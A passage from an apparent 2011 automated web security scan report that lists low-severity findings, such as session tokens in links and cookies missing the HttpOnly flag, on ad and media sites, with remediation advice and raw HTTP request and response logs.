Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...

4.6. http://www.fastcompany.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- ContextWeb Start -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=replace&advid=996&token=FACO1" width="1" height="1" border="0">
<!-- ContextWeb End -->
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 51 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://teamsugar.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://teamsugar.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: teamsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jj74rf9b5tana4c9qnqn6bimm6; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/
Set-Cookie: fg_locale=0; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: client_locale=US; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: sugarTestGroup=test; expires=Wed, 12-Oct-2011 12:47:53 GMT; path=/
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHkxaznENVLWjwa6r%2F7%2FQyRFoDzvuZz8AHFrPwF2UlWsOSIIMrujdWcpuo8VFkywg9FaGJmF0KJRXqCWs5NNKfWFiSyueATPQRfbR%2B1oC0dkUnnxhQoHq43iqkB01kLggEksGLjY551W6XFy28G0iib7WHLy2wxKaiGtC1Pj3NDByA%3D%3D%7Ca8777ef288ebc1c6896acd503ed0e87922f8d289; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Location: http://www.popsugar.com/community/welcome
Connection: close
Date: Mon, 12 Sep 2011 12:47:53 GMT
Server: lighttpd/1.4.26
Content-Length: 0


5.2. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

5.3. http://a.visualrevenue.com/vr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.visualrevenue.com
Path:   /vr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vr.js HTTP/1.1
Host: a.visualrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Cache-control: no-cache="set-cookie"
Content-Type: application/x-javascript
Date: Mon, 12 Sep 2011 12:47:51 GMT
Expires: Wed, 14 Sep 2011 12:47:51 GMT
Last-Modified: Tue, 01 Mar 2011 15:37:51 GMT
Server: nginx/1.0.5
Set-Cookie: AWSELB=0BEDD35ED8E6CA32BF18800A787004E3CF91BCBE3BFFB80FABF921A28E20105DFD0A7192507C14F040EBFEBE46C99980BBB5B288638CA88B7C61B7C4DEF91CE45E362C70;PATH=/;MAX-AGE=1800
Content-Length: 1105
Connection: keep-alive

(function(){function j(h){var b;a:{b=document.cookie.split(";");for(var c=0;c<b.length;c++){for(var a=b[c];a.charAt(0)==" ";)a=a.substring(1,a.length);if(a.indexOf("__vrf=")==0){b=a.substring(6,a.leng
...[SNIP]...

5.4. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...

5.5. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1620509&_salt=1964679122&B=10&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:30 GMT
Pragma: no-cache
Content-Length: 846
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

var l = (screen.width - 300) / 2;
var t = (screen.height - 600) / 2;
var pop = window.open('http://adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAAAEAAAAAAAAAAAAA
...[SNIP]...

5.6. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1079030&id=1079199&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
